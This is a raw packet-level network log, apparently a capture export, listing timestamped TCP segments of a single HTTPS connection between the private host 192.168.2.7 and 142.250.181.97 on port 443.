Dec 17, 2024 13:21:38.581280947 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:38.581302881 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:38.581587076 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:38.581636906 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:38.581995010 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:38.627332926 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.415429115 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.415508032 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.428971052 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.429054022 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.535298109 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.535470963 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.535487890 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.535537958 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.539458990 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.539526939 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.607115984 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.607240915 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.610965014 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.611016989 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.611025095 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.611073971 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.616913080 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.616965055 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.624725103 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.624775887 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.625973940 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.626023054 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.630781889 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.630835056 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.637964010 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.638020992 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.643379927 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.643436909 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.651751995 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.651823044 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.655560017 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.655623913 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.665378094 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.665438890 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.668874025 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.668919086 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.679116011 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.679172039 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.682585001 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.682662010 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.692856073 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.692930937 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.696337938 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.696393013 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.706684113 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.706753016 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.710189104 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.710249901 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.720405102 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.720477104 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.726804972 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.726867914 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.734117031 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.734178066 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.734258890 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.734316111 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.747980118 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.748080969 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.769443989 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.769525051 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.769532919 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.769582033 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.799030066 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.799108982 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.799133062 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.799187899 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.801300049 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.801347017 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.804151058 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.804212093 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.804217100 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.804271936 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.810941935 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.811002970 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.811027050 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.811072111 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.822693110 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.822766066 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.822772980 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.822818995 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.822824001 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.822887897 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.834062099 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.834135056 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.834152937 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.834198952 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.844454050 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.844671965 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.844677925 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.844723940 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.854788065 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.854859114 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.854865074 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.854912996 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.864840984 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.864905119 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.864912987 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.864953041 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.874958992 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.875031948 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.875044107 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.875083923 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.885061979 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.885114908 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.885133028 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.885194063 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.895426989 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.895510912 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.895519018 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.895565033 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.905364990 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.905448914 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.905544043 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.905591011 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.914947033 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.914994955 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.915059090 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.915108919 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.924067020 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.924113035 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.924182892 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.924222946 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.933206081 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.933262110 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.933321953 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.933374882 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.941927910 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.941973925 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.942049980 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.942102909 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.942109108 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.942148924 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.943276882 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.943332911 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.950337887 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.950402021 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.951132059 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.951175928 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.963912964 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.963952065 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.965099096 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.965147018 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.965591908 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.965627909 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.968158960 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.968203068 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.975260973 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.975310087 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.976213932 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.976259947 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.978390932 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.978435993 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.979568958 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.979614019 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.984807014 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.984852076 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.986035109 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.986078978 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.991166115 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.991219044 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.992413044 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.992465019 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.997560978 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.997612000 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:41.998759985 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:41.998806953 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.003038883 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.003087997 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.004292011 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.004339933 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.008115053 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.008164883 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.009342909 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.009391069 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.013457060 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.013505936 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.014709949 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.014756918 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.018609047 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.018660069 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.018716097 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.018760920 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.023737907 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.023783922 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.023817062 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.023861885 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.029217958 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.029273987 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.029309034 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.029351950 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.033981085 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.034034014 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.034111977 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.034260035 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.039122105 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.039175987 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.039210081 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.039251089 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.045017958 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.045087099 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.045281887 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.045331955 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.049249887 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.049321890 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.049391031 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.049431086 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.054225922 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.054275990 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.054300070 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.054342031 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.059237003 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.059309006 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.059370041 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.059417009 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.064332962 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.064398050 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.064470053 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.064513922 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.068958044 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.069010019 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.069084883 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.069128036 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.073880911 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.074038029 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.074044943 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.074091911 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.078490973 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.078547001 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.078638077 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.078686953 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.083379984 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.083441019 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.083446026 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.083491087 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.088304043 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.088356018 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.088360071 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.088399887 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.093225956 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.093272924 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.093291998 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.093338013 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.097440958 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.097492933 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.097558975 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.097605944 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.102086067 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.102135897 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.102256060 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.102298975 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.106925011 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.106992960 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.106997967 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.107040882 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.111254930 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.111319065 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.111382008 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.111429930 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.115906954 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.115962982 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.116044044 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.116092920 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.120372057 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.120433092 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.120476007 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.120551109 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.125123024 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.125190020 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.125195980 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.125279903 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.129173994 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.129244089 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.129313946 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.129484892 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.129489899 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.129535913 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.134011984 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.134066105 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.134088993 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.134135008 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.137948990 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.138003111 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.138408899 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.138453960 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.142117977 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.142172098 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.142617941 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.142662048 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.146306992 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.146358013 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.146712065 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.146764040 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.151231050 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.151298046 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.151335001 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.151386023 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.154771090 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.154834986 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.154851913 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.154894114 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.158634901 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.158690929 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.158725977 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.158772945 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.162467957 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.162539005 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.162591934 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.162638903 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.168735027 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.168792009 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.168797970 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.168839931 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.170191050 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.170243979 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.170367002 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.170418024 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.174263000 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.174324989 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.174334049 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.174384117 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.181772947 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.181843042 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.181848049 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.181891918 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.182898998 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.182954073 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.182959080 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.183005095 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.186568022 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.186630011 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.186718941 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.186767101 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.190052986 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.190110922 CET	49763	443	192.168.2.7	142.250.181.97
